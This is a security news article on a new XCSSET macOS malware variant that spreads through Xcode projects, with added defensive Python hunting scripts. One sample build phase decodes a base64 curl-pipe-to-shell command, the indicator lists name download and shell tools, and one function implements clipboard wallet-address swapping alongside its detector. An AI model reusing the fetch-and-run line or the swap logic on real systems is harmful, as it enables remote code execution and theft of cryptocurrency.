Microsoft Threat Intelligence has identified yet another variant of the XCSSET malware, a long-running macOS threat targeting software developers through malicious Xcode project infections. This new version brings expanded functionality, advanced obfuscation, and new persistence tactics, making it one of the most sophisticated macOS malware strains currently active.
As Microsoft explains, "The XCSSET malware is designed to infect Xcode projects, typically used by software developers, and run while an Xcode project is being built. We assess that this mode of infection and propagation banks on project files being shared among developers building Apple or macOS-related applications."
Because the malicious code rides inside the project files themselves, this supply-chain-style tactic lets the malware spread on its own as infected projects are shared among developers.
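The page does not detail how an infected project runs its payload at build time, so the following is an added example rather than Microsoft's analysis or XCSSET's own code. It assumes the common pattern of a malicious Run Script build phase, and shows a simple hunt: parse the `PBXShellScriptBuildPhase` objects out of a `project.pbxproj`, unescape each `shellScript`, and flag indicators such as `osascript`, base64-decoded payloads, downloads and pipes to a shell, including inside any base64 blob the script carries. The project fragment and indicator list are constructed for this example.

```python
"""Hunt for suspicious Run Script build phases in an Xcode project.pbxproj.

Added example; the parser is a regex heuristic for the old-style ASCII plist
format, not a full pbxproj parser. Sample data below is constructed.
"""
import base64
import re
from dataclasses import dataclass, field

# Constructed project.pbxproj fragment: one benign lint phase and one phase
# that decodes a base64 blob into a shell and calls osascript (sample only).
SAMPLE_PBXPROJ = r'''
// !$*UTF8*$!
{
    objects = {
        AA01 /* Run Script */ = {
            isa = PBXShellScriptBuildPhase;
            name = "Run Script";
            shellPath = /bin/sh;
            shellScript = "\"${PODS_ROOT}/SwiftLint/swiftlint\" --strict\n";
        };
        AA02 /* Run Script */ = {
            isa = PBXShellScriptBuildPhase;
            name = "Run Script";
            shellPath = /bin/sh;
            shellScript = "echo Y3VybCAtZnNTTCBodHRwOi8vMTI3LjAuMC4xL3ggfCBzaA== | base64 --decode | sh\nosascript -e 'do shell script \"echo hi\"'\n";
        };
        AA03 /* Sources */ = {
            isa = PBXSourcesBuildPhase;
            files = ();
        };
    };
}
'''

# Indicator heuristics (this example's own labels, not Microsoft's detections).
INDICATORS = [
    (r"base64\s+(?:-d|-D|--decode)\b", "base64 decode"),
    (r"\bosascript\b", "osascript"),
    (r"\b(?:curl|wget)\b", "network download"),
    (r"\|\s*(?:sh|bash|zsh)\b", "pipe to shell"),
    (r"\beval\b", "eval"),
]


@dataclass
class BuildPhase:
    object_id: str
    name: str
    script: str
    indicators: list = field(default_factory=list)


def _unescape(s):
    """pbxproj strings use C-style escapes for quotes, backslashes and newlines."""
    return re.sub(r"\\(.)", lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)), s)


def _decoded_blobs(script):
    """Return printable UTF-8 text hidden in base64 tokens embedded in the script."""
    blobs = []
    for token in re.findall(r"[A-Za-z0-9+/]{20,}={0,2}", script):
        try:
            text = base64.b64decode(token, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if all(c.isprintable() or c.isspace() for c in text):
            blobs.append(text)
    return blobs


def _indicators(text, suffix=""):
    return [label + suffix for pattern, label in INDICATORS if re.search(pattern, text)]


def scan_pbxproj(text):
    """Return every PBXShellScriptBuildPhase with its unescaped script and indicators."""
    phases = []
    # Object ids are hex; the comment after the id is optional.
    for m in re.finditer(r"([0-9A-F]{4,24})\s*(?:/\*.*?\*/)?\s*=\s*\{(.*?)\n\s*\};", text, re.S):
        object_id, body = m.group(1), m.group(2)
        if "isa = PBXShellScriptBuildPhase;" not in body:
            continue
        name_m = re.search(r'\bname\s*=\s*"?([^";]*)"?;', body)
        script_m = re.search(r'shellScript\s*=\s*"((?:[^"\\]|\\.)*)"\s*;', body)
        script = _unescape(script_m.group(1)) if script_m else ""
        phase = BuildPhase(object_id, name_m.group(1) if name_m else "", script)
        phase.indicators = _indicators(script)
        for blob in _decoded_blobs(script):
            phase.indicators += _indicators(blob, " (base64-decoded)")
        phases.append(phase)
    return phases


def suspicious_phases(text):
    """Only the phases that tripped at least one indicator."""
    return [p for p in scan_pbxproj(text) if p.indicators]


if __name__ == "__main__":
    for p in suspicious_phases(SAMPLE_PBXPROJ):
        print(f"{p.object_id} ({p.name}): {', '.join(p.indicators)}")
```

Run it against a real project with `scan_pbxproj(open("App.xcodeproj/project.pbxproj").read())`; any Run Script phase that decodes or downloads code deserves a look before the project is built, because Xcode executes it with the developer's privileges.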
The latest variant introduces several new modules and updated behaviors:
- Browser Data Theft: "It expands its data exfiltration capabilities to include Firefox browser data." Using a modified version of the open-source HackBrowserData project, the malware extracts passwords, cookies, credit card details, and browsing history.
- Clipboard Hijacking for Crypto Theft: "This variant features a submodule designed to monitor the clipboard and references a downloaded configuration file containing address regex patterns associated with various digital wallets." If a match is found, XCSSET replaces the copied wallet address with one controlled by the attacker.
- Persistence Upgrades: A new LaunchDaemon-based persistence module allows XCSSET to disable Apple's Rapid Security Response and security configuration updates, while masquerading as a fake "System Settings.app" to avoid detection.
- Stealthy Execution: The malware employs "sophisticated encryption and obfuscation techniques, uses run-only compiled AppleScripts for stealthy execution," making analysis and detection far more difficult.
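A LaunchDaemon that impersonates "System Settings.app" leaves traces a defender can look for: a launchd job whose executable lives inside an Apple-named app bundle outside /System/Applications, or in a user-writable directory, or whose label borrows the com.apple. prefix from a non-system directory. The hunt below is an added example, not part of the page or of Microsoft's report; the two LaunchDaemon plists are constructed, and the particular paths and checks are this example's assumptions rather than documented XCSSET indicators.

```python
"""Flag LaunchDaemons whose executable masquerades as an Apple system app.

Added example with constructed sample plists; the rules are heuristics.
"""
import plistlib
from pathlib import Path

# App bundle names that only belong under /System/Applications (assumed list).
APPLE_APP_NAMES = {"System Settings.app", "System Preferences.app"}
# A root-run daemon should never execute from somewhere an ordinary user can write.
USER_WRITABLE_PREFIXES = ("/Users/", "/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/")

# Constructed samples: one ordinary third-party helper, one fake "System Settings".
SAMPLE_DAEMONS = {
    "/Library/LaunchDaemons/com.docker.vmnetd.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key><string>com.docker.vmnetd</string>
  <key>Program</key><string>/Library/PrivilegedHelperTools/com.docker.vmnetd</string>
  <key>RunAtLoad</key><true/>
</dict>
</plist>""",
    "/Library/LaunchDaemons/com.apple.settings.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key><string>com.apple.settings</string>
  <key>ProgramArguments</key>
  <array><string>/Users/Shared/System Settings.app/Contents/MacOS/System Settings</string></array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict>
</plist>""",
}


def executable_path(job):
    """launchd accepts either Program or ProgramArguments; argv[0] is the binary."""
    if "Program" in job:
        return job["Program"]
    args = job.get("ProgramArguments") or []
    return args[0] if args else ""


def assess_daemon(plist_path, raw_plist):
    """Return a record with the reasons (possibly none) this job looks suspicious."""
    job = plistlib.loads(raw_plist)
    label = job.get("Label", "")
    exe = executable_path(job)
    reasons = []
    if label.startswith("com.apple.") and not plist_path.startswith("/System/Library/"):
        reasons.append("com.apple label in a non-system directory")
    for component in exe.split("/"):
        if component in APPLE_APP_NAMES and not exe.startswith("/System/Applications/"):
            reasons.append(f"{component} bundle outside /System/Applications")
    if exe.startswith(USER_WRITABLE_PREFIXES):
        reasons.append("executable in a user-writable location")
    return {"plist": plist_path, "label": label, "exe": exe, "reasons": reasons}


def hunt(daemons):
    """daemons maps plist path -> raw bytes; returns only the flagged jobs."""
    results = (assess_daemon(path, raw) for path, raw in daemons.items())
    return [r for r in results if r["reasons"]]


def scan_launchdaemons(directory="/Library/LaunchDaemons"):
    """Read every plist in a real LaunchDaemons directory and hunt over them."""
    found = {str(p): p.read_bytes() for p in Path(directory).glob("*.plist")}
    return hunt(found)


if __name__ == "__main__":
    for hit in hunt(SAMPLE_DAEMONS):
        print(hit["plist"], "->", hit["exe"])
        for reason in hit["reasons"]:
            print("   ", reason)
```

On a live Mac, `scan_launchdaemons()` covers /Library/LaunchDaemons; run it again with /Library/LaunchAgents and each user's ~/Library/LaunchAgents, since the same masquerade works for per-user jobs. Pair the hit with `codesign -dv` on the executable: a genuine Apple app is signed by Apple, and a bundle in /Users/Shared will not be.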
Microsoft notes that the first three stages mirror earlier variants, but the fourth stage has been heavily upgraded. It begins with the boot() function, which now includes "additional checks for Firefox browser and modified logic for Telegram existence check" and downloads new malicious submodules.
These submodules handle tasks such as data validation, encryption and decryption of C2 traffic, and clipboard monitoring that checks several conditions before swapping a copied wallet address, so that the replacement passes for normal clipboard activity.
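To make the clipboard-swapping logic concrete, and to show what a defender can do with the same regexes, here is an added example that is not code from the page or from XCSSET. The configuration mapping wallet regex patterns to attacker addresses is a constructed stand-in for the downloaded file the article mentions, the "only swap a bare address" rule is an assumed example of the realism conditions, and every address is a syntactically valid placeholder, not a real wallet. The detector side polls successive clipboard values and alerts when an address is replaced by a different address of the same family.

```python
"""Clipboard wallet-swap logic and a matching detector (added example).

SWAP_CONFIG stands in for the downloaded regex configuration; all addresses
are placeholders. The swap conditions are assumptions for illustration.
"""
import re
from dataclasses import dataclass

SWAP_CONFIG = {
    r"^0x[0-9a-fA-F]{40}$": "0x" + "ab" * 20,            # Ethereum-style hex address
    r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$": "1" + "B" * 33,   # Bitcoin legacy (base58)
    r"^bc1[ac-hj-np-z02-9]{39,59}$": "bc1q" + "z" * 38,   # Bitcoin bech32
}


def hijack(clipboard_text, config=SWAP_CONFIG):
    """Return what a swapper would write back, or None if it leaves the clipboard alone.

    Assumed realism conditions: the clipboard must hold exactly one bare address
    (no surrounding text or whitespace), and an already-swapped value is untouched.
    """
    text = clipboard_text.strip()
    if not text or text != clipboard_text:
        return None
    for pattern, attacker_address in config.items():
        if re.match(pattern, text):
            return None if text == attacker_address else attacker_address
    return None


def simulate(user_copies, config=SWAP_CONFIG):
    """Clipboard contents an observer polling after every change would see."""
    observed = []
    for text in user_copies:
        observed.append(text)                 # the user's own copy
        swapped = hijack(text, config)
        if swapped is not None:
            observed.append(swapped)          # the swapper's overwrite
    return observed


@dataclass
class Alert:
    before: str
    after: str
    pattern: str


def detect_swaps(samples, patterns=tuple(SWAP_CONFIG)):
    """Alert when consecutive samples are two different addresses of the same family."""
    alerts = []
    for before, after in zip(samples, samples[1:]):
        if before == after:
            continue
        for pattern in patterns:
            if re.match(pattern, before) and re.match(pattern, after):
                alerts.append(Alert(before, after, pattern))
    return alerts


# Constructed sequence of things a user copies: prose, a bare ETH address,
# an address embedded in a sentence (left alone), and a bare BTC address.
USER_COPIES = [
    "meeting at 3pm",
    "0x" + "00" * 20,
    "send to 0x" + "00" * 20 + " please",
    "1" + "A" * 33,
]

if __name__ == "__main__":
    for alert in detect_swaps(simulate(USER_COPIES)):
        print(f"clipboard address changed: {alert.before} -> {alert.after}")
```

A real monitor would replace `simulate` with a loop over `pbpaste` (or NSPasteboard's changeCount) at a short interval. Treat an alert as a lead rather than proof: a user who copies two different addresses in a row trips the same rule, so correlate the change with whether a copy keystroke actually happened.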
Although attacks remain limited in scope, the group's tactics indicate a targeted campaign against macOS developers and users in the cryptocurrency and tech sectors. Microsoft warns, "While we're only seeing this new XCSSET variant in limited attacks as of this writing, we're publishing our comprehensive analysis to increase awareness of this evolving threat."
The company has also collaborated with Apple and GitHub to take down repositories hosting malicious Xcode projects.
The new XCSSET variant shows how macOS malware continues to mature, with advanced obfuscation, targeted data theft modules, and persistence mechanisms designed to bypass Apple's defenses. By targeting developers and leveraging shared project files, XCSSET represents not just a malware strain, but a supply-chain threat to the broader Apple ecosystem.